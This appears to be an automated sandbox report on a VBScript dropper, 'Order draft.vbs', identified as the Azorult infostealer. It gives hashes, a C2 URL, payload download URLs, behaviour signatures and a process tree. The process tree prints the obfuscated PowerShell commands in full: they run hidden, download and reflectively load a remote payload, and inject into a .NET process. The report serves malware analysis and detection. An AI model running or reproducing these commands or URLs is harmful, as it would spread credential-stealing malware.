Analysis

  • max time kernel
    95s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-09-2024 06:37

General

  • Target

    Order draft.vbs

  • Size

    504KB

  • MD5

    581a2142bc26026893bbdfab4e65f694

  • SHA1

    e5b3a5977750cd34a69e908bf22893f153b9301f

  • SHA256

    e5550d60a971336699ae2ddf5a88ef9ef0e2ac8d9bae8db9ebadf8e360ad3df1

  • SHA512

    5f74d6b90e9791f7c403690126fdd4f0bfcfde9dcd099d1ef0adb72d8f94b89ed1e9f708eaf2e853da1a681cbf3695e0421191f52902870dfbcedad5b9ff8808

  • SSDEEP

    12288:u9M/PycpcyDgDy8f1xLWFIZni8itFw9UPpVaElOOywO5lowt4sG50v8eKjDo6c5l:S0ifJtH

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
    exe.dropper: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

  • Family
    azorult
  • C2
    http://mg5n.shop/ML341/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with its display window hidden.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Loads dropped DLL 4 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order draft.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}'+'url ='+' {'+'2}ht'+'t'+'ps:'+'/'+'/'+'ia60'+'01'+'00.'+'us.a'+'r'+'chive.'+'org/24/'+'items/'+'detah-note-v/DetahNot'+'eV.'+'txt{2}'+';{'+'0}ba'+'se64C'+'ont'+'en'+'t'+' ='+' (Ne'+'w-'+'O'+'b'+'ject'+' Sys'+'tem.'+'Net.WebCl'+'i'+'en'+'t'+').'+'Downlo'+'adStr'+'ing('+'{0}u'+'r'+'l)'+';{0}bi'+'naryCont'+'e'+'nt '+'= '+'[Sy'+'st'+'e'+'m'+'.'+'Convert'+']:'+':Fr'+'omBa'+'se'+'6'+'4'+'St'+'rin'+'g({0}'+'base6'+'4Co'+'nt'+'ent)'+';'+'{0}'+'a'+'s'+'sem'+'bly = [R'+'e'+'f'+'lec'+'ti'+'o'+'n.'+'A'+'ssembly]::Load({0'+'}binaryContent'+');'+'{0'+'}t'+'y'+'pe '+'= {0}as'+'se'+'mbly.G'+'e'+'t'+'Type({2'+'}RunPE.'+'Ho'+'me{2}'+')'+';'+'{0}metho'+'d '+'= '+'{0}t'+'ype.GetM'+'eth'+'od({2}VA'+'I{2}'+')'+';{'+'0}met'+'h'+'od.Invoke'+'({'+'0}nul'+'l, '+'[object[]'+']@({2}'+'75eb209c54d6-ca7'+'8'+'-a3b4-3'+'5d7-017dbc'+'5c'+'=ne'+'k'+'ot&a'+'ide'+'m='+'t'+'l'+'a'+'?t'+'xt'+'.e'+'sab'+'/o'+'/m'+'oc'+'.'+'topsp'+'pa'+'.3'+'2e3'+'5'+'-ytic-'+'re'+'byc/'+'b'+'/'+'0v/moc.sipael'+'goog'+'.eg'+'a'+'r'+'ots'+'e'+'sab'+'eri'+'f'+'/'+'/'+':s'+'ptth'+'{2} , '+'{2}1{2}'+' ,'+' {2}C'+':{1}P'+'r'+'ogra'+'m'+'D'+'at'+'a{1}{'+'2} ,'+' {'+'2'+'}araneogr'+'afia{'+'2},{2}Add'+'InProce'+'ss32{2}'+',{2}{'+'2'+'}))') -F [CHar]36,[CHar]92,[CHar]39)| &( $EnV:comsPec[4,24,25]-jOIn'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\araneografia.vbs"
          4⤵
          PID:2296
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • Loads dropped DLL
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • outlook_office_path
            • outlook_win_path
            PID:1712

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

    • C:\Users\Admin\AppData\Local\Temp\061CA707\mozglue.dll

      Filesize

      135KB

      MD5

      9e682f1eb98a9d41468fc3e50f907635

      SHA1

      85e0ceca36f657ddf6547aa0744f0855a27527ee

      SHA256

      830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d

      SHA512

      230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed

    • C:\Users\Admin\AppData\Local\Temp\061CA707\msvcp140.dll

      Filesize

      429KB

      MD5

      109f0f02fd37c84bfc7508d4227d7ed5

      SHA1

      ef7420141bb15ac334d3964082361a460bfdb975

      SHA256

      334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

      SHA512

      46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

    • C:\Users\Admin\AppData\Local\Temp\061CA707\nss3.dll

      Filesize

      1.2MB

      MD5

      556ea09421a0f74d31c4c0a89a70dc23

      SHA1

      f739ba9b548ee64b13eb434a3130406d23f836e3

      SHA256

      f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb

      SHA512

      2481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2

    • C:\Users\Admin\AppData\Local\Temp\061CA707\vcruntime140.dll

      Filesize

      81KB

      MD5

      7587bf9cb4147022cd5681b015183046

      SHA1

      f2106306a8f6f0da5afb7fc765cfa0757ad5a628

      SHA256

      c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

      SHA512

      0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_px5cy2gq.k4x.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1712-30-0x0000000000400000-0x0000000000420000-memory.dmp

      Filesize

      128KB

    • memory/1712-24-0x0000000000400000-0x0000000000420000-memory.dmp

      Filesize

      128KB

    • memory/1836-22-0x0000020F45470000-0x0000020F4567C000-memory.dmp

      Filesize

      2.0MB

    • memory/1968-0-0x00007FFA2FD73000-0x00007FFA2FD75000-memory.dmp

      Filesize

      8KB

    • memory/1968-31-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

      Filesize

      10.8MB

    • memory/1968-12-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

      Filesize

      10.8MB

    • memory/1968-11-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

      Filesize

      10.8MB

    • memory/1968-6-0x000001C10A300000-0x000001C10A322000-memory.dmp

      Filesize

      136KB